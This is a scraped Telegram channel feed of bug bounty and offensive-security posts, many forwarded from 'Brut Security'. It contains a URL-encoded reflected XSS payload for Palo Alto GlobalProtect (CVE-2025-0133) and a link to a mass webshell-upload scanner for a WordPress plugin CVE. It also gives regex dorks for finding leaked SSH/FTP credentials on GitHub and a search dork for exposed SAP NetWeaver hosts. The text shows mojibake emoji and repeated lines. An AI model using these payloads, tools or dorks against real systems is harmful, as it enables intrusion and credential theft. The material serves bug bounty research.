Forwarded from Brut Security
π¨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.
β https://github.com/ill-deed/CVE-2025-34085-Multi-target
β https://github.com/ill-deed/CVE-2025-34085-Multi-target
β€11π₯3
Forwarded from Brut Security
β‘BrutDroid 2.0 is a powerful, Windows-optimized toolkit designed specifically for Android Studio, streamlining the setup of a mobile penetration testing lab. Built to make Android pentesting effortless, it automates emulator creation, rooting, Frida server setup, and Burp Suite certificate installation. With a vibrant new UI and support for custom Frida scripts, BrutDroid empowers security researchers to focus on testing, not setup. Linux support is coming soon!
β https://github.com/Brut-Security/BrutDroid
βDon't forget to leave a star :)
β https://github.com/Brut-Security/BrutDroid
βDon't forget to leave a star :)
β€20β‘5π2πΏ1
Asset inventory of over 800 public bug bounty programs.
https://github.com/trickest/inventory
β€11π3
BB Target-
https://www.nooks.ai/responsible-disclosure-processwww.nooks.ai
Responsible Disclosure Process
β€4
Forwarded from Brut Security
π¨CVE-2025-0133 : Payload + Template
Payload:
Write-up: https://codewithvamp.medium.com/cve-2025-0133-reflected-xss-vulnerability-in-palo-alto-globalprotect-gateway-portal-028128f2f5b9
Template: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-0133.yaml
Payload:
%3Csvg%20xmlns%3D%22http%3A%2F%http://2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3EWrite-up: https://codewithvamp.medium.com/cve-2025-0133-reflected-xss-vulnerability-in-palo-alto-globalprotect-gateway-portal-028128f2f5b9
Template: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-0133.yaml
β€12π2π1
π₯Fresh BB Target - https://www.computerwaard.nl/.well-known/security.txt
β€16π1
Bug Bounty Programs Dork -
Coordinated Vulnerability Disclosure "app.zerocopter.com"π₯20β€10
Forwarded from Brut Security
This media is not supported in your browser
VIEW IN TELEGRAM
β‘Safari Address Bar Spoof via Cursor Overlap
β https://github.com/RenwaX23/X/blob/master/safari_bug2.md
β https://github.com/RenwaX23/X/blob/master/safari_bug2.md
π₯9β€4π2
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯13β€8π€3
Please open Telegram to view this post
VIEW IN TELEGRAM
β€15π₯6
Please open Telegram to view this post
VIEW IN TELEGRAM
β€17π1
Forwarded from Brut Security
Happy Durga Puja to all Brut Security members! May Maa Durga bless you with strength, wisdom, and protection in every battle you fight, both in life and in cyberspace. π π π
Please open Telegram to view this post
VIEW IN TELEGRAM
π12β€7π€1
A quick way to find "all" paths for Next.js websites:
console.log(__BUILD_MANIFEST.sortedPages)
javascriptβ:console.log(__BUILD_MANIFEST.sortedPages.join('\n'));π₯15β€5
Forwarded from Brut Security
Common Security Issues in FinanciallyOriented Web Applications
β€4π3
Forwarded from Brut Security
common_security_issues_in_financially_orientated_web_applications.pdf
654.4 KB
π6π₯3β€2
Forwarded from Brut Security
β‘Bug Bounty Tip π
β Level up your recon with GitHub's new regex search on cs.github.com! Hunt for hardcoded credentials like SSH & FTP connection strings.
π¨Example Dorks:
/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/
β Level up your recon with GitHub's new regex search on cs.github.com! Hunt for hardcoded credentials like SSH & FTP connection strings.
π¨Example Dorks:
/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/
π₯8π4β€3
Forwarded from Brut Security
CVE-2025-42944, -42937, -42910, and other: Multiple vulnerabilities in SAP NetWeaver, 5.3 - 10.0 π₯π₯π₯
In its October bulletin, SAP published a list of 13 new vulnerabilities affecting NetWeaver, NetWeaver AS Java, and other products. These vulnerabilities include Insecure Deserialization, Information Disclosure, etc.
Search at Netlas.io:
π Link: https://nt.ls/aBHGg
π Dork: http.headers.server:"NetWeaver"
Vendor's advisory: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/october-2025.html
In its October bulletin, SAP published a list of 13 new vulnerabilities affecting NetWeaver, NetWeaver AS Java, and other products. These vulnerabilities include Insecure Deserialization, Information Disclosure, etc.
Search at Netlas.io:
π Link: https://nt.ls/aBHGg
π Dork: http.headers.server:"NetWeaver"
Vendor's advisory: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/october-2025.html